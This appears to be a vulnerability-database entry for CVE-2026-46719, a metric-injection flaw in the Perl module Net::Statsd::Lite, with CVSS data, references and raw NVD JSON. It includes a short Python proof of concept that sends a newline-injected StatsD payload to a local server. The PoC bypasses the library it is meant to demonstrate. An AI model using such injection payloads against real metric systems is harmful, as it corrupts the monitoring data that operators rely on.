CVE-2026-46719

Description

Net::Statsd::Lite versions before 0.9.0 for Perl allowed metric injections. The metric names were not checked for newlines, colons or pipes. Metrics generated from untrusted sources could inject additional statsd metrics.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Net::Statsd::Lite < 0.9.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket

# PoC for CVE-2026-46719: Net::Statsd::Lite Metric Injection
# Description: This script demonstrates how a newline character in a metric name
# can inject a second, arbitrary metric into the StatsD server.

STATSD_HOST = '127.0.0.1'
STATSD_PORT = 8125

# The vulnerable component allows newlines, colons, and pipes in the metric name.
# Payload breakdown:
# 'legit_metric:1|c' -> The legitimate metric the app intends to send.
# '\n' -> The newline separator that breaks the protocol.
# 'injected_metric:666|c' -> The malicious metric injected by the attacker.

payload = b"legit_metric:1|c\ninjected_metric:666|c"

print(f"[*] Sending payload to {STATSD_HOST}:{STATSD_PORT}")
print(f"[*] Payload content: {payload}")

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (STATSD_HOST, STATSD_PORT))
sock.close()

print("[+] Payload sent successfully. Check StatsD for 'injected_metric'.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-46719
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-46719
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-46719/
[4] VulDB https://vuldb.com/cve/CVE-2026-46719
[5] https://github.com/robrwo/Net-Statsd-Lite/commit/e1a8ab866d75c2827982134e9cf7e51a7f771153.patch
[6] https://metacpan.org/release/RRWO/Net-Statsd-Lite-v0.9.0/changes
[7] http://www.openwall.com/lists/oss-security/2026/05/16/9

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-46719", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-05-16T14:16:37.507", "lastModified": "2026-05-19T14:16:47.137", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Net::Statsd::Lite versions before 0.9.0 for Perl allowed metric injections.\n\nThe metric names were not checked for newlines, colons or pipes. Metrics generated from untrusted sources could inject additional statsd metrics."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-93"}]}], "references": [{"url": "https://github.com/robrwo/Net-Statsd-Lite/commit/e1a8ab866d75c2827982134e9cf7e51a7f771153.patch", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "https://metacpan.org/release/RRWO/Net-Statsd-Lite-v0.9.0/changes", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/16/9", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}